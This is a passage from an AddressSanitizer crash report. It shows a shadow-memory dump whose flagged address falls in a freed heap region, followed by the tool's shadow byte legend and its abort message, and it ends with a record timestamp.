0x0c047ffff5e0: fa fa 00 fa fa fa 05 fa fa fa 01 fa fa fa 01 fa\n  0x0c047ffff5f0: fa fa 01 fa fa fa fd fd fa fa 05 fa fa fa 01 fa\n  0x0c047ffff600: fa fa fd fd fa fa 00 01 fa fa fd fd fa fa fd fa\n  0x0c047ffff610: fa fa fd fa fa fa fd fa fa fa 01 fa fa fa 00 fa\n  0x0c047ffff620: fa fa 01 fa fa fa fd fa fa fa fd fa fa fa fd fa\n=>0x0c047ffff630: fa fa fd fa fa fa fd fd fa fa 00 06 fa fa[fd]fa\n  0x0c047ffff640: fa fa fd fd fa fa fd fa fa fa 02 fa fa fa 02 fa\n  0x0c047ffff650: fa fa 07 fa fa fa fd fd fa fa 00 00 fa fa fd fa\n  0x0c047ffff660: fa fa 02 fa fa fa 06 fa fa fa 07 fa fa fa 02 fa\n  0x0c047ffff670: fa fa fd fa fa fa 06 fa fa fa 02 fa fa fa fd fa\n  0x0c047ffff680: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fa\nShadow byte legend (one shadow byte represents 8 application bytes):\n  Addressable:           00\n  Partially addressable: 01 02 03 04 05 06 07 \n  Heap left redzone:       fa\n  Freed heap region:       fd\n  Stack left redzone:      f1\n  Stack mid redzone:       f2\n  Stack right redzone:     f3\n  Stack after return:      f5\n  Stack use after scope:   f8\n  Global redzone:          f9\n  Global init order:       f6\n  Poisoned by user:        f7\n  Container overflow:      fc\n  Array cookie:            ac\n  Intra object redzone:    bb\n  ASan internal:           fe\n  Left alloca redzone:     ca\n  Right alloca redzone:    cb\n  Shadow gap:              cc\n==25706==ABORTING", "creation_timestamp": "2026-06-13T13:00:31.000000Z"}